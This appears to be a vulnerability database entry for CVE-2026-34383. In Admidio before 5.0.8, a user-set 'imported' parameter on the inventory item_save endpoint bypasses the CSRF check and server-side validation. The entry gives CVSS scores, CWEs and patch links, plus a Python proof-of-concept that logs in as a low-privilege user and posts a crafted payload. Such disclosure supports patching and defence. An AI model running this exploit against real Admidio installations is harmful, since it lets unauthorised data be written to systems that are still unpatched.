Security Vulnerability Report
CVE-2026-34383 CVSS 4.3 MEDIUM


Published: 2026-03-31 21:16:30
Last Modified: 2026-04-01 18:28:07

Description

Admidio is an open-source user management solution. Prior to version 5.0.8, the inventory module's item_save endpoint accepts a user-controllable POST parameter, "imported", which, when set to true, completely bypasses both CSRF token validation and server-side form validation. An authenticated user can send a direct POST request that saves arbitrary inventory item data without CSRF protection and without the field value checks that the FormPresenter validation normally enforces. This issue has been patched in version 5.0.8.

CVSS Details

Secondary assessment
CVSS Score: 4.3
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N

Primary assessment
CVSS Score: 3.5
Severity: LOW
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N

The two assessments differ only in User Interaction (UI:N versus UI:R); the page headline uses the secondary score of 4.3.

Configurations (Affected Products)

cpe:2.3:a:admidio:admidio:*:*:*:*:*:*:*:* - VULNERABLE
Admidio < 5.0.8

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import sys

import requests

# Target URL configuration
target_url = "http://example.com/admidio/adm_program/modules/inventory/item_save.php"
login_url = "http://example.com/admidio/adm_program/system/login.php"

# Attacker's credentials (low privilege)
credentials = {
    "usr_login": "attacker",
    "usr_password": "password123",
}

session = requests.Session()

# Step 1: Authenticate to get a valid session cookie
# The vulnerability requires an authenticated user (PR:L)
login_resp = session.post(login_url, data=credentials)
if login_resp.status_code != 200:
    print("Login failed")
    sys.exit(1)

# Step 2: Exploit the vulnerability by setting 'imported' to true
# This bypasses CSRF token check and server-side validation
payload = {
    "item_name": "Malicious Item",
    "item_quantity": 99999,  # Invalid value that would normally be rejected
    "imported": "true",  # The key parameter to trigger the bypass
}
exploit_resp = session.post(target_url, data=payload)

# Check if the arbitrary data was saved
if exploit_resp.status_code == 200 and "success" in exploit_resp.text:
    print("[+] Exploit successful! Arbitrary data saved bypassing validation.")
else:
    print("[-] Exploit failed.")

Weaknesses

CWE-20 (Improper Input Validation)
CWE-352 (Cross-Site Request Forgery)

References

https://github.com/Admidio/admidio/commit/00494b95dfe847af8b938e4397e5d909d8f36839 - Patch
https://github.com/Admidio/admidio/security/advisories/GHSA-4rwm-c5mj-wh7x - Exploit, Mitigation, Vendor Advisory